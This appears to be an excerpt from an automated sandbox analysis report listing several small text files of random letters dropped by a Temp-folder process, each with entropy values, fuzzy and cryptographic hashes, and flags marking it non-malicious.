                                                                                                                                                                                                                                Preview:NIKHQAIQAUYLAGKSNVEIEFIHRXSBOKMMEGWDWAKSEZEDBXXYJJOUSSENRJICLDBYWKJEUKRIBTNODZEVLZHOZSPIROLEDDZIVDLRTCVHZIXTARRYNQXDSJTZFOOYHUCROZUVPHMDRIWZWYNOATHQMKGZMPPIBYIAXUSGLYFPQTHUARHNEBTECYTUUCXJOESOPPKVXGBHXGPHIYJEJAYBFOVPMDVWEZNFBQJKZAWGCIWNFBSDPSSBBQTNYDJVQTTPUWPOOTVYKITOESDZWHOTFCZIQUYASDBGWAPMXAFIGQFPGWTRNBMHCXAZNMKIOSHYBMTSDERCDBFQSLEBTIGMCRUGZJZQAMYIFXIHLBUBWXCKIQTVQNMYMUYZWTTRQAVEAQFTTDTEFYTIXVPFUZALHHYLJHLNOFTPHODDWSFLBPCVKNDNFYPRHRVBHZSKKAJYBRTRWEHCIAZYAWYXGIRJSURFADGDZBTKMLEAYICWBYEAKNBIIDMQKZIXOLIQHETRIJJOSQDVZXKTZOMXOXGKIEJJNUHMCNVBNTYVETDBZHKYQLQYJBSUUNGMIURLIIINJAVXYNHTVSYTVBSAGNGQGUYADHTCDXNDKQFKCMHFRLWQZMSHDZEBEGPOSOPFUUHIVYBVXTLHFYHMHALQHNIUKMTKRBYZDOEALSNTXJRYMEETOQRISFEOVJSBVNMZFHXIDWOPIZKHISVTXVHAUPHEUOQLFVPNKREKEFDTLOWUVDKPDDCBKKSSGLLJSGVCAKVVFFKUKYVELNQTKZZRSDNEKDHUGDQWFBGFQMTINSXDOXPQOPZWHRDBBIZNGWLXSHCGVIBTIQEUTFYRIYKHRANDXVFREQPDFPRAKAFCQSRGTEIQGEAVDTJRESPBHYVTTLHWYQSKOZIBJZRSUJETZFCGMBHNYUSWWAENDXQUJFMLWZXGNLDFLSRZJBBJCPWKHFZXEVBDCLKULDSDXUFVEWFBMUMFQQONCJFFBARKNAVJ
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.696250160603532
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:5Gvoddnzj/gxR0e7uyJ9MLyy07KpRnPgNcnA+2/nSgTfK0Xzy:wv4zCR0ouAMG3wPgNuAZnSQXzy
                                                                                                                                                                                                                                MD5:2B6A90B7D410E3A4E2B32C90D816B4FE
                                                                                                                                                                                                                                SHA1:B8CD90C4CDCF41CBF18D88A4C01BBA22F670AD83
                                                                                                                                                                                                                                SHA-256:D65D483904467EB7373EDA8DFAE2070C057FC93465A4AC5C9FEF8B42340D9DAB
                                                                                                                                                                                                                                SHA-512:03AFBF42E5C04E928D03C687B0F17A0AB15428C78958B206DC6C50118B961C9DDF88A6E53B3115F09FDEE44EAFA46B262933164055532D3B4B4F9265F42A6C58
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:NWTVCDUMOBTPRQQPHXQLIMGPJXTEMPBNYLBFKQFUEVGISJSVQRMPMZSAYEYQSOTUAJFILXLTKFEVHLSAMYEEFLNJSHLTTFXRTDNUGXEFIGVCAWPMDNUICDIZGPHMESKWSMUPNOFEVXFTSHSKLCVHQTNKDHDMDRJOUTEUSCAUAVMVBMOSYKKRPPZYFUGXFXWMWRACKFCQOUHITLUCHGFZEOIPNCJFJOVBZIKDRNERXOSPKSRMHKTJUGFEOONFWLVNTJWXUFPADWYIUDKAZQXCZRFPUQQAMRTIOEHUDTLGOWYMIDOZAXTLGVEGUCQLJZGMIEQYOLWEMSGZUBWXOIBQEMQLQVGRBTUICFCEJGFTZRZCKJQEMATEONIMJKBYGQYDYXOLLROWXGYCNCVPTMRZSMMSZXKMNPSCJJJKKNRAJXGSLZNKJRJRGMCCCBCIGTLTFKNVDVIHYLGRNXDVIVWBCPNKNIFJAPQQWDQQEDDKNHVJRQJTKCUADORWREEDYTVFAOWHPNXWSNAJCVXCLLTNQPMJQHDILFNQUZJZZJJMMNDNGEBEGSTVAGZJMSMZHWJKNIAFGBUYMVADKCVLDGFQETUZXGUOUWXBBPNOWFERKMKMPOXIOTKJERPVXJGCIUKAGDGITLFYRIBAPKRESMNOMTVTZCXMODUUIGFMEMBMGAGXFZGAAZFCXDWBKKCPUKFFNMVKDFFVZYWKEKBWMADWDZXUIOOLCLIACESGRBJRSMXKUSOKXJEICCPRFWSISDTKVTDVAYSWLRHTWJGCXQMNITQJHCBMSCDRWKMGADWILLATOPVPILEQQGAIPRRUCJFTRRSSWITQKIWJOATZOBETZDBBWAIJIOXCUQSILQHQKEZXWFWWNVEWKZCGFYPBDSDBSFAZDZFRHJBZIGOZCVUGODUTNCDHKKMFHSYKUSFSXOMOUXZYOSUZNJQBXAVPOBTVBINMSIPYONLYRKIHONKWHSUAJWIALOTZAQJSNTIH
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.688284131239007
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                                                                                                                                                                                MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                                                                                                                                                                                SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                                                                                                                                                                                SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                                                                                                                                                                                SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:XZXHAVGRAGWUZPDZUEGAYKLOJAATOVXJVRJCLWZVJFOFPZNHYWDUACWAEZMWROZFSNVNLUZTIGQHRPFNIXZWAQNKEFFVMFVJEYHESHQWKICFNAONPPGGSABXPCYNBZITQCMUVOCKUUGGEKLAFNXLBOWPVKEOIBLWWAPOYVIECYONJSQKQQDXGYONJXNAQTSMYDMXZYXYEGULUXOLZALCFDXCFNFKPZDKANUFUXWMRLBIQALSWLXEXAFGLOYIFRMFQEZVUTIKXYTPJYCVKCQFZXEECZIXEIHQZQQYTVHKAQLEKMWMZZULQXNCKIJZACKDTKVLWIVBKFQXXOMIGVNYLPAXZFSMAZJTXJUXMZPVKWUQVNXGFUJUQLXWUJWXXGWFDEHIUZKLUQKWAGSXVVNNFXCYWQGRDZCZRLRYXTMLQRGEHRFDGZJOZZKKYLKBWQOZXHGQWMYFROUTIBGKPARBJPOEDNOQMKUEALEVNBPCUIKVTPAWCUIHGVFJWDYFDWTASWSIDDELYILSJEFAACQCZMSARBUAQIRFFLJJMHBVZYFUUTOLDYGUUVIYGJYNXGWJCYUYVJKCVNACSGWHTSOCDOFFPNNHQEMEAXXRINULLPFMNSQUWWIGEJQABGOQLKIXTZYHHQQTOZYLTNJMMWELZZPDIDHXRBCJGZUDMDGVMAEUIWFYWGIHBTOBLWXIEGHJRIDDBTOXKXOOIAAJUPCJRNMROGCUNSCGQYEEZLWOYIYMJPGKLDXEOGUAUHNUJCEFMGEKRBWDAHWRXWVSFQCURHTSGJQWPJHWEAHXCEQVKJRECGPJBGCDBEGBIRMVXHGYHMWJXIXMQHTKSZFVSATJKNAJOYAJNKDTKZMBHRENBCAYUBASQOTKKVNCTZIOGOUVVDNXYVJFHXTPSZMOWWCPPMBMLCTTPGONDVJOVLCMTWRESLSDGLNGAGTIXVYAJZVBYYHWAMERRRQXMWVCYELNGPYXOGOPHWVXCTQIKXSK
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699548026888946
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                                                                                                                                                                                MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                                                                                                                                                                                SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                                                                                                                                                                                SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                                                                                                                                                                                SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.699434772658264
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:Khfv+VFngw6i0t5Ut+l3kHwMDkhBlBAMFPxYaija:pvl6Pt5uQ3kQ0khBl1VxYpu
                                                                                                                                                                                                                                MD5:02D3A9BE2018CD12945C5969F383EF4A
                                                                                                                                                                                                                                SHA1:085F3165672114B2B8E9F73C629ADABBF99F178D
                                                                                                                                                                                                                                SHA-256:6088E17DB4C586F5011BC5E16E8BF2E79C496EB6DAE177FF64D9713D39D500CA
                                                                                                                                                                                                                                SHA-512:A126D98EE751D0FB768E4DB7D92CBC6AE7852FEE337B85ED045D871DB321C6C98FD58A244D058CA3F41348216C68CB4A37FA854980BB16D358AA62A932DD867E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:ONBQCLYSPUBDAQCIGYNWXHPENQNLJZGXCHXSNXZNCZBUHYDXPEMCJPAWYQSVHMGKHJUFFFYDAXDAHOLOAZEPTWZTWDGPFLXMMCXLCIIJOXMVRNMUMTICVHQSWNAGIYCQBOZZHONWWBXKDUJYBRPSLNFGTUIFTNGJEATOXKHEFMERAQZVBMQGKZUKXDBMGRJDOOGATZZKQMEZJRWZVAZRPQTVWPETCIMLPMYNWZLVLXRPUUKLNIMTYDNYIJTZEFJDNMWTOFFKRRINCRDCFGJAJNMYQHGXGVHVYPEUFBNUIGUVGBYQKIAJLIVACVIHEGZIYKSROURNGZSCTUKBKFFCGPXAONPDEBIZJRKCFYHATDXLXYKGLWXBCHJERCRNMKESIMBDNPMPBWXSVSEAAUEKEGUIJBZLAESAFZHMBLPPKMNTZAZIIYSHMWJBFTZZSKYNFJYSBRLGVHOWZUQHXUSSJESIEKHZLTLILMSMJZHXFWGJQNWQCDLXEWBZPGBTVDVCPPUFLFGNZRUKJOANJVXVTXLOQLFUIVEWTCBKOBYZMAOTIMQMJYRYLSOLSSACCLCFTVXCKKJDNWQAETNXHIOQCDTXLLVEQLNLGDIOULNFNNDXTVYYSPDWWZHDSYHBRXMUAAHJIGSGLSFKCGADPUAASYZFEZWHYDLQDUCHJXMNMTNCDCMNIJQCSGEQOGVGYBYPMTZBBFOACZMMKVFNELOMGSTCQUDRFKLFGOHOTZKZCWJWDRECGYETFYOWLYECGICMGUKZRVNHUQTLQLHUTPRZXBVYMPAFBLSWKSSKBGWCWBFEEZIAZUZGEYMYBSXYUCHEALFJRSGWQJMABNQHSZANDDTYMVJKXFFFDEENZAGRGVLHFELVOSGTXVOOPFGCQDSFWOYKKOYUHFWMXWPLHFIIPORMEJNOFYMJRBAZLYTIOKEFIWPDZUKMIWKLZXBOESUCXZXQSCMQKDKFBCHJMPMZHELLNSYYEJNBRRXVBMPD
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.695685570184741
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                                                                                                                                                                                MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                                                                                                                                                                                SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                                                                                                                                                                                SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                                                                                                                                                                                SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:UMMBDNEQBNVIMBNGHYZCBKXWMQJKYISTANSRNFXXBKALIIEMEWAFQEPTEMZCIXXNMQBGOXWSDYSAWKIYPJITNREMVRXPPJZFUTMGRRRGTCHVLEWVUJGZEUQVONQVACEFWZUCIAFXPFGXIUOOBZEEMGMWJQIEKKICYJJWAFUKYZAJEGUQKGDPRPXCOWIPBRUGHWDFZLGSKZVCHVVPGLEFNGIVLBVNAOVXAPGATADJBIQTBNJGWXRSEYKCSVZOSTCBHYFHUDEWNGEIFCVREPZDZDZRITFEVFCQQWJYZXPUKJWHTWGWASTKDCAVEWZOIGFZHRWCJBVRLDWGVKPABCQUOHQIMLUFUGYGMPGPEMSRPPSGWIGRVPBGZIWLNEVYFFJBCMBSXVABNRNXULCTUAANAXDHKZOGVCNQZHMRBENWTTLQVVMDLNBEWHLPZHMPDGRLJWAQJDJRCWTFWIOLAURRCSMFJOCFDKUGPLTPABARXKPCRXOIHHVRWXAKGHOTYLCEQQYYDKVZQSYLCAEGGBQMMJGSNJWBTJXSVALINNRLURMPNGFXHJRVJIKQJSDLNIOXGIGDFDCOTGGXMDLTDYSIKCMPVINDDXXQCEQCRUBLFEWMYMSEGUHIKIGUYOMOXSKOTVNUNGWUFYKYRNZXOOTSRYXLZHRZXNEDJUNPYGNIIZSPVQBOLBRRRWGDMQWUTRSZWBYMXNMLKLFNZWJVDDPMJOXTVBMYRXNQFGBLURKFIUAHJBFFXNWQDYRLZADYGMETNXEOXLOJKYQPEYHUVTFGXQTGPQBWZQTVFXZFUVQERQZJCYYPFBYONAVFDOLTNRGWQYGSYWCWUWRETJZGVJMEFQTYPOLONVZFREVORMBQJOCLOALCJHHCHQSHKLUNBIRHRBSQSMERLKKFTGHUQKRPFIIELZZVXZVNHCIQYYXNMJNSOZOIRGGJKUWXNCWSNCFMGQIQVNKVIGRCLSDWQPEDLSLTGBRXRTMGFWYQSCLN
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.701757898321461
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                                                                                                                                                                                MD5:520219000D5681B63804A2D138617B27
                                                                                                                                                                                                                                SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                                                                                                                                                                                SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                                                                                                                                                                                SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):1026
                                                                                                                                                                                                                                Entropy (8bit):4.69156792375111
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24:wT4Ye6841ff8PdGjcDOa8AtDLSoarbrGxYsrxpuzu:/Ye68AIGjiOaDDc4uzu
                                                                                                                                                                                                                                MD5:A4E170A8033E4DAE501B5FD3D8AC2B74
                                                                                                                                                                                                                                SHA1:589F92029C10058A7B281AA9F2BBFA8C822B5767
                                                                                                                                                                                                                                SHA-256:E3F62A514D12A3F7D0EB2FF2DA31113A72063AE2E96F816E9AD4185FF8B15C91
                                                                                                                                                                                                                                SHA-512:FB96A5E674AE29C3AC9FC495E9C75B103AE4477E2CA370235ED8EA831212AC9CB1543CB3C3F61FD00C8B380836FE1CA679F40739D01C5DDE782C7297C31F4F3A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:unknown
